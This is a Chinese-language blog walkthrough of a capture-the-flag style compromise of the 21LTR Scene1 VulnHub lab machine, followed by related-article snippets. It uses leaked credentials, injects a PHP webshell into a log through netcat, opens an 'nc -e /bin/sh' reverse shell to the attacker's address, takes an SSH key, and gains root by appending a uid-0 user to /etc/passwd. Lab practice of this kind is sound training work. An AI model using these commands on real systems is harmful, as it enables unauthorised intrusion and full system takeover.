21LTR 靶机

已于 2024-07-30 15:52:58 修改
阅读量137 收藏 2
点赞数 6
文章标签: web安全
于 2024-07-30 15:41:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62162207/article/details/140798446
版权

一、信息收集

1.设置静态IP(靶机和虚拟机)

扫描开放端口

查看http网页,发现没有别的功能点

右键查看页面源代码,发现了一个账号密码

扫描目录,扫到一个logs目录

二、渗透测试

尝试访问,发现没有权限

发现还开放着ssh和ftp端口,尝试利用源代码泄露出的账号密码远程连接

username:logs

password:zg]E-b0]+8:(58G

ssh连接失败

ftp成功连接

dir发现该目录下有一个文件且是满权限

查看文件内容发现没有权限

将其远程下载到kali

get backup_log.php /home/kali/Desktop/s.php

查看文件内容

发现内容可能是一个日志文件,尝试网页打开,打开成功

传说,需要访问10001端口才能写入到日志里面来

在端⼝ 10001 上启动了⼀个 netcat 会话,我们得到了⼀个空⽩的 shell,往里写入一个webshell

nc -nv 192.168.2.120 10001
<?php system($_GET['cmd']) ?>

网页输入cmd=id,弹出信息

输入反弹shell

nc -e /bin/sh 192.168.2.128 4444

监听成功

获取一个交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

三、权限提升

cd /media/USB_1/Stuff/Keys
ls

发现了两个文件

查看authorized_keys 文件,找到一个账户

查看账号信息,发现确实有一个hbeale的账户

cat /etc/passwd | grep "/bin/bash"

查看密钥文件id_rsa

尝试用密钥文件进行登录

ssh -i id_rsa hbeale@192.168.2.120

登录成功,查看权限

提权root

查看/etc/passwd文件权限,有写入权限

kali生成一个密钥

openssl passwd 123456

创建一个newroot账户

echo 'newroot:$1$n/MP0bwU$y5JOdgSoN0M72XqU1rclU0:0:0:root:/root:/bin/bash' >> /etc/passwd

su newroot进行连接

提权成功

下届免单用户
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF之21LTR Scene1 靶机渗透(日志信息,Wireshark抓包)
afei001
08-02 720
  练习环境     攻击机:kali     靶机21LTR: Scene1     下载地址:https://download.vulnhub.com/21ltrcom/21LTR.com_Scene1_2.120_v1.0.iso      1.发现靶机,端口扫描 root@kali:~# ifconfig eth0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.2.3 .
21LTR: Scene 1靶机
m0_61995767的博客
07-30 571
21LTR: Scene 1打靶记录
Hack the 21LTR: Scene 1 VM (Boot to Root)
marcushbs的博客
08-21 405
靶机下载链接: https://www.vulnhub.com/entry/21ltr-scene-1,3/ 主机扫描: ╰─ nmap -p1-65535 -sV -sC -A 192.168.2.120 Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-28 11:19 CSTNmap scan report for 192.168.2.120Host is up (0.0012s latency).Not shown: 65532 ...
21LTR-Scene靶机渗透测试
weixin_58786230的博客
07-30 423
【代码】21LTR-Scene靶机渗透测试。
21ltr-scene-1靶机
m0_65285254的博客
07-31 295
根据靶机描述,该靶机静态ip地址为192.168.2.120。因为之前扫描到ftp,ssh端口开放,使用该密码分别进行连接。ls查看文件,发现 backup_log.php 文件。利用/etc/passwd可写提权,写入用户到该文件中。访问/logs/backup_log.php 成功。按照格式将其echo到文件/etc/passwd中。扫描开放的全端口 开放21,22,80端口。当在网页上拼接访问logs时,访问被拒绝。将其下载到本地,在kali上查看内容。没发现什么功能点,对其进行目录扫描。
Hack the 21LTR: Scene 1 靶机
hqy250019的博客
07-30 375
在端口 10001 上启动了一个 netcat 会话,我们得到了一个空白的 shell。cmd=id,尝试运行 id命令,发现得到回复。创建root权限的新用户和密码,将自动生成的hash值加入/etc/passwd。将文件下载到我们的本地系统后,我们使用 cat 命令在kali中打开该文件。发现扫描都没有,右键查看源代码,获得了一些登录凭据。ls,发现一个backup_log.php文件。在网站路径上拼接/logs/,发现访问被拒绝。再尝试ftp连接,发现连接成功。尝试ssh连接,发现连接失败。
vulnhub系列:21LTR:Scene1靶机
jq_j37的博客
07-29 375
21LTR:Scene1靶机,打靶文章
21LTR:Scene1超详细靶机实战
weixin_68615160的博客
07-30 414
考虑到是日志文件,我们可以尝试将一句话木马写到日志文件中获取shell。读取密钥 /media/USB_1/Stuff/Keys/id_rsa。尝试用该账号连接ssh服务和ftp服务,成功连接ftp服务。我们想起来刚刚目录探测有一个logs目录,我们尝试访问。将newroot用户写入到/etc/passwd。发现不需要密码的只有cat命令,我们就用它去提权。我们F12查看页面源码可以发现一个用户和密码。考虑到有ssh服务,我们可以使用密钥免密登录。写入一个高权限用户到/etc/passwd。
【vulnhub】Hack the 21LTR: Scene 1 靶机
wbplife的博客
08-11 378
然后将root用户的密码写入1.txt,然后开始破解,但是连接的时候,还是连接不上,应该是配置原因,那么只能写入高权限用户了。尝试拼接到刚才目录扫描的目录的logs目录下,发现可以访问到日志文件/logs/backup_log.php。可以通过cat提权,所以可以看/etc/shadow文件,或者写入文件,选择读取shadow文件,破解密码。尝试ssh连接没成功,但是ftp连接成功了,ls查看,发现只有一个文件。尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口。赋予权限,然后ssh登录。
LTR.zip_ltr
09-24
标题 "LTR.zip_ltr" 暗示我们关注的焦点是一个与化学工程相关的计算程序,特别是关于液态回流(LTR)的算法。在石油炼制、化工生产等领域,蒸馏塔是重要的分离设备,而液态回流是蒸馏过程中优化效率的关键因素。这个...
LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A
07-15
标题中的“LTR_559ALS.rar_LTR 年用量_LTR_559ALS_STM32驱动LTR-303_STM32驱动LTR_559A”表明这是一个关于LTR-559ALS光感应器在STM32微控制器上的驱动程序和应用的资源包。关键词“年用量”可能指的是该传感器在特定...
LTR-578ALS_Spec & Design Guides_V1.3.pdf
04-07
LTR-578ALS is a 3-in-1 sensor module, digital light sensor (ALS) + proximity sensor (PS) + built-in IR LED (940nm) with direct I2C interface, in a miniature chipled lead-free surface mount package ...
ltr-tools:一套用于学习排名的命令行工具
05-19
该项目同时包含ltr-tools cli和solr配置,以提供后端搜索功能。 该项目的主要范围将是提供有用的工具,以帮助“学习排名”集成和开发。 ltr-tools是一个命令行界面,用于运行一组实用程序任务,以可视化,调试和...
LtR-Feature-Extractor:学习排名特征提取任务
04-28
《LtR特征提取器:深度探索学习排名与信息检索》 在信息检索(IR)领域,学习排名(Learning-to-Rank, LTR)是一种至关重要的技术,它通过机器学习方法来优化文档排序,以提高搜索结果的相关性。LtR特征提取器就是...
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-06 1118
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
【网络安全】逻辑漏洞:绕过应用程序重要功能
等风来
09-01 273
拦截请求,将其发送到 Burp 中的 Repeater,当我尝试重放请求时,我收到了“ 500 响应”,表示出现错误
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
09-06 770
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【网络安全】漏洞挖掘
anquan2233的博客
08-29 1620
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法中、会在tokenizer.process()中 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
pytorch ltr
11-29
PyTorch LTR是指利用PyTorch框架进行的学习到排名的技术。LTR代表Learning to Rank,是一种机器学习领域的技术,旨在训练模型以根据查询和相关文档的特征对文档进行排序。PyTorch是一个基于Python的开源机器学习库,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值